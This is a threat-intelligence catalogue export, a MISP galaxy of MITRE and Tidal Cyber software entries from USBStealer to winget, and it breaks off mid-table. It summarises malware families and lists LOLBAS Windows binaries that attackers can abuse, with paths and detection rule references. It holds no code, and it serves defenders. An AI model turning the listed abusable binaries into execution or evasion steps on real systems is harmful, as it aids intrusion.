USBStealer is malware that has been used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. [ESET Sednit USBStealer 2014] [Kaspersky Sofacy]
Internal MISP references
UUID 50eab018-8d52-46f5-8252-95942c2c0a89
which can be used as unique global reference for USBStealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0136 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
UtilityFunctions
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Paths: * C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Resources: * https://twitter.com/nickvangilder/status/1441003666274668546
Detection: * Sigma: proc_creation_win_lolbas_utilityfunctions.yml[UtilityFunctions.ps1 - LOLBAS Project]
Internal MISP references
UUID 50a57a6f-6597-42d1-b686-7003c631ddb0
which can be used as unique global reference for UtilityFunctions
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5262 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Valak
Valak is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.[Cybereason Valak May 2020][Unit 42 Valak July 2020]
Internal MISP references
UUID b149f12f-3cf4-4547-841d-c63b7677547d
which can be used as unique global reference for Valak
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0476 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
VaporRage
VaporRage is a shellcode downloader that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 63940761-8dea-4362-8795-7bc0653ce1d4
which can be used as unique global reference for VaporRage
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0636 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Vasport
Vasport is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Vasport May 2012]
Internal MISP references
UUID fe116518-cd0c-4b10-8190-4f57208df4e4
which can be used as unique global reference for Vasport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0207 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
vbc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used to compile VBS code
Author: Lior Adar
Paths: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_visual_basic_compiler.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml[vbc.exe - LOLBAS Project]
Internal MISP references
UUID 25ae056b-aa3d-4bfb-9b53-ba76bce0dad1
which can be used as unique global reference for vbc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5171 |
source | Tidal Cyber |
tags | ['bc6f5172-90af-491e-817d-2eaa522f93af', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VBShower
VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.[Kaspersky Cloud Atlas August 2019]
Internal MISP references
UUID 150b6079-bb10-48a8-b570-fbe8b0e3287c
which can be used as unique global reference for VBShower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0442 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Venus Ransomware
A prominent ransomware family.[HC3 Analyst Note Venus Ransomware November 2022]
Internal MISP references
UUID 2f33ae13-8ab2-4ec1-8358-c81218c1f3a5
which can be used as unique global reference for Venus Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5293 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Verclsid
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to verify a COM object before it is instantiated by Windows Explorer
Author: @bohops
Paths: * C:\Windows\System32\verclsid.exe * C:\Windows\SysWOW64\verclsid.exe
Resources: * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Detection: * Sigma: proc_creation_win_verclsid_runs_com.yml * Splunk: verclsid_clsid_execution.yml[LOLBAS Verclsid]
Internal MISP references
UUID 56dc0bea-bdfb-4731-b6c0-425fb7f9bf4d
which can be used as unique global reference for Verclsid
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5172 |
source | Tidal Cyber |
tags | ['4e91036d-809b-4eae-8a09-86bdc6cd1f0e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VERMIN
VERMIN is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. [Unit 42 VERMIN Jan 2018]
Internal MISP references
UUID afa4023f-aa2e-45d6-bb3c-38e61f876eac
which can be used as unique global reference for VERMIN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0257 |
source | MITRE |
type | ['malware'] |
Vidar Stealer
Vidar Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. While many of today's most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers nonetheless continue to add new capabilities, for example to improve the malware's stealth.[Minerva Labs Vidar Stealer Evasion]
More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).
Internal MISP references
UUID ced8364c-e0e2-429a-a029-300fa2f0d5be
which can be used as unique global reference for Vidar Stealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5071 |
source | Tidal Cyber |
tags | ['fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
VisualUiaVerifyNative
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Resources: * https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ * https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_visualuiaverifynative.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[VisualUiaVerifyNative.exe - LOLBAS Project]
Internal MISP references
UUID acfbcd12-25fd-41cd-83ef-c7af7cb59fff
which can be used as unique global reference for VisualUiaVerifyNative
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5246 |
source | Tidal Cyber |
tags | ['5e096dac-47b7-4657-a57b-752ef7da0263', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Volgmer
Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. [US-CERT Volgmer Nov 2017]
Internal MISP references
UUID 7fcfba45-5752-4f0c-8023-db67729ae34e
which can be used as unique global reference for Volgmer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0180 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
VSDiagnostics
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command-line tool used for performing diagnostics.
Author: Bobby Cooke
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Resources: * https://twitter.com/0xBoku/status/1679200664013135872
Detection: * Sigma: https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml[VSDiagnostics.exe - LOLBAS Project]
Internal MISP references
UUID fca6d378-bbe6-4418-b238-6a9a63aaabba
which can be used as unique global reference for VSDiagnostics
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5244 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Vshadow
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
Author: Ayberk Halaç
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.XXXXX.0\x64\vshadow.exe
Resources: * https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample
Detection: * IOC: vshadow.exe usage with -exec parameter[Vshadow.exe - LOLBAS Project]
Internal MISP references
UUID f39988b4-acf7-4d56-a7e5-8e8fa0b8ccc2
which can be used as unique global reference for Vshadow
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5247 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VSIISExeLauncher
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: timwhite
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe
Resources: * https://github.com/timwhitez
Detection: * Sigma: proc_creation_win_lolbin_vsiisexelauncher.yml * IOC: VSIISExeLauncher.exe spawned an unknown process[VSIISExeLauncher.exe - LOLBAS Project]
Internal MISP references
UUID 2517da5a-11b1-4f77-b488-c096173b1b50
which can be used as unique global reference for VSIISExeLauncher
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5245 |
source | Tidal Cyber |
tags | ['0bf195a2-c577-4317-973e-a72dde5a06e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
vsjitdebugger
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: Oddvar Moe
Paths: * c:\windows\system32\vsjitdebugger.exe
Resources: * https://twitter.com/pabraeken/status/990758590020452353
Detection: * Sigma: proc_creation_win_susp_use_of_vsjitdebugger_bin.yml[vsjitdebugger.exe - LOLBAS Project]
Internal MISP references
UUID 34ba500e-c37c-45ec-abf4-16e2f76d82c8
which can be used as unique global reference for vsjitdebugger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5248 |
source | Tidal Cyber |
tags | ['71bc284c-bfce-4191-80e0-ef70ff4315bf', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
vsls-agent
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Resources: * https://twitter.com/bohops/status/1583916360404729857
Detection: * Sigma: proc_creation_win_vslsagent_agentextensionpath_load.yml[vsls-agent.exe - LOLBAS Project]
Internal MISP references
UUID 99f752db-12c4-45a7-9f7b-f4fcda033462
which can be used as unique global reference for vsls-agent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5253 |
source | Tidal Cyber |
tags | ['375cb8ad-2b6a-49b7-8eb3-757aaaf72d8b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VSS Copying Tool (Play Ransomware)
Play ransomware operators are known to use a custom tool that serves as an interface for interacting with Windows Volume Shadow Copy Service ("VSS") over APIs. The tool can enumerate and copy files and folders in a VSS snapshot prior to encryption to serve as backups.[Symantec Play Ransomware April 19 2023]
Internal MISP references
UUID a3ebc075-c87b-4400-9498-09bb95d47231
which can be used as unique global reference for VSS Copying Tool (Play Ransomware)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5301 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
vstest.console
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VSTest.Console.exe is the command-line tool to run tests
Author: Onat Uzunyayla
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe * C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
Resources: * https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022
Detection: * IOC: vstest.console.exe spawning unexpected processes[vstest.console.exe - LOLBAS Project]
Internal MISP references
UUID dfbe173f-5c36-4596-aefb-7ccf504e03c8
which can be used as unique global reference for vstest.console
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5254 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wab
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows address book manager
Author: Oddvar Moe
Paths: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe
Resources: * https://twitter.com/Hexacorn/status/991447379864932352 * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Detection: * Sigma: registry_set_wab_dllpath_reg_change.yml * IOC: WAB.exe should normally never be used[Wab.exe - LOLBAS Project]
Internal MISP references
UUID 6cbd62e8-9024-42d7-93d5-6b8b3409425b
which can be used as unique global reference for Wab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5173 |
source | Tidal Cyber |
tags | ['a53c9f4b-6f0d-4afa-b1ac-8e2d91279210', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WannaCry
WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.[LogRhythm WannaCry][US-CERT WannaCry 2017][Washington Post WannaCry 2017][FireEye WannaCry 2017]
Internal MISP references
UUID 6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a
which can be used as unique global reference for WannaCry
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0366 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '45795633-a32b-4d9e-8620-4044ac056647', '09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WARPWIRE
WARPWIRE is a JavaScript credential stealer that harvests plaintext usernames and passwords for exfiltration; it was used during Cutting Edge to target Ivanti Connect Secure VPNs.[Mandiant Cutting Edge January 2024][Mandiant Cutting Edge Part 2 January 2024]
Internal MISP references
UUID 9a592b49-1701-5e4c-95cf-9b8c98b80527
which can be used as unique global reference for WARPWIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1116 |
source | MITRE |
type | ['malware'] |
WarzoneRAT
WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[Check Point Warzone Feb 2020][Uptycs Warzone UAC Bypass November 2020]
Internal MISP references
UUID cfebe868-15cb-4be5-b7ed-38b52f2a0722
which can be used as unique global reference for WarzoneRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0670 |
source | MITRE |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WastedLocker
WastedLocker is a ransomware family attributed to Indrik Spider that has been used since at least May 2020. WastedLocker has been used against a broad variety of sectors, including manufacturing, information technology, and media.[Symantec WastedLocker June 2020][NCC Group WastedLocker June 2020][Sentinel Labs WastedLocker July 2020]
Internal MISP references
UUID 0ba6ee8d-2b29-4980-8e55-348ea05f00ad
which can be used as unique global reference for WastedLocker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0612 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Waterbear
Waterbear is modular malware attributed to BlackTech that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.[Trend Micro Waterbear December 2019]
Internal MISP references
UUID 56872a5b-dc01-455c-85d5-06c577abb030
which can be used as unique global reference for Waterbear
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0579 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WEBC2
WEBC2 is a family of backdoor malware used by APT1 as early as July 2006. WEBC2 backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. [Mandiant APT1 Appendix][Mandiant APT1]
Internal MISP references
UUID f228af8f-8938-4836-9461-c6ca220ed7c5
which can be used as unique global reference for WEBC2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0109 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WellMail
WellMail is a lightweight malware written in Golang used by APT29, similar in design and structure to WellMess.[CISA WellMail July 2020][NCSC APT29 July 2020]
Internal MISP references
UUID b936a1b3-5493-4d6c-9b69-29addeace418
which can be used as unique global reference for WellMail
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0515 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WellMess
WellMess is a lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by APT29.[CISA WellMess July 2020][PWC WellMess July 2020][NCSC APT29 July 2020]
Internal MISP references
UUID 20725ec7-ee35-44cf-bed6-91158aa03ce4
which can be used as unique global reference for WellMess
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0514 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Wevtutil
Wevtutil is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.[Wevtutil Microsoft Documentation]
Internal MISP references
UUID 2bcbcea6-192a-4501-aab1-1edde53875fa
which can be used as unique global reference for Wevtutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0645 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '5db11c6f-cba4-4865-b993-7a3aafd0f037', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wfc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Paths: * C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_wfc.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[Wfc.exe - LOLBAS Project]
Internal MISP references
UUID dadd1243-6a4a-4ce2-9eea-1c530e7510d9
which can be used as unique global reference for Wfc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5249 |
source | Tidal Cyber |
tags | ['be621f15-1788-490f-b8bb-85511a5a8074', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WhisperGate
WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[Cybereason WhisperGate February 2022][Unit 42 WhisperGate January 2022][Microsoft WhisperGate January 2022]
Internal MISP references
UUID 791f0afd-c2c4-4e23-8aee-1d14462667f5
which can be used as unique global reference for WhisperGate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0689 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Wiarp
Wiarp is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Wiarp May 2012]
Internal MISP references
UUID 7b393608-c141-48af-ae3d-3eff13c3e01c
which can be used as unique global reference for Wiarp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0206 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Windows Credential Editor
Windows Credential Editor is a password dumping tool. [Amplia WCE]
Internal MISP references
UUID 7c2c44d7-b307-4e13-b181-52352975a6f5
which can be used as unique global reference for Windows Credential Editor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0005 |
source | MITRE |
tags | ['1d306cbd-9894-4322-a233-b1576b8e25ba'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
WINDSHIELD
WINDSHIELD is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID ed50dcf7-e283-451e-95b1-a8485f8dd214
which can be used as unique global reference for WINDSHIELD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0155 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WindTail
WindTail is a macOS surveillance implant used by Windshift. WindTail shares code similarities with Hack Back aka KitM OSX.[SANS Windshift August 2018][objective-see windtail1 dec 2018][objective-see windtail2 jan 2019]
Internal MISP references
UUID 3afe711d-ed58-4c94-a9b6-9c847e1e8a2f
which can be used as unique global reference for WindTail
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0466 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WINERACK
WINERACK is a backdoor used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 5f994df7-55b0-4383-8ebc-506d4987292a
which can be used as unique global reference for WINERACK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0219 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winexe
Winexe is a lightweight, open source tool similar to PsExec designed to allow system administrators to execute commands on remote servers. [Winexe Github Sept 2013] Winexe is unique in that it is a GNU/Linux based client. [Überwachung APT28 Forfiles June 2015]
Internal MISP references
UUID 65d5b524-0e84-417d-9884-e2c501abfacd
which can be used as unique global reference for Winexe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0191 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wingbird
Wingbird is a backdoor that appears to be a version of commercial software FinFisher. It is reportedly used to attack individual computers instead of networks. It was used by NEODYMIUM in a May 2016 campaign. [Microsoft SIR Vol 21] [Microsoft NEODYMIUM Dec 2016]
Internal MISP references
UUID 3e70078f-407e-4b03-b604-bdc05b372f37
which can be used as unique global reference for Wingbird
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0176 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
winget
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Package Manager tool
Author: Paul Sanders
Paths: * C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe
Resources: * https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended
Detection: * IOC: winget.exe spawned with local manifest file * IOC: Sysmon Event ID 1 - Process Creation * Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html * Sigma: proc_creation_win_winget_local_install_via_manifest.yml[winget.exe - LOLBAS Project]
Internal MISP references
UUID 6c4e7a00-0151-490c-8a41-98981d355725
which can be used as unique global reference for winget
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
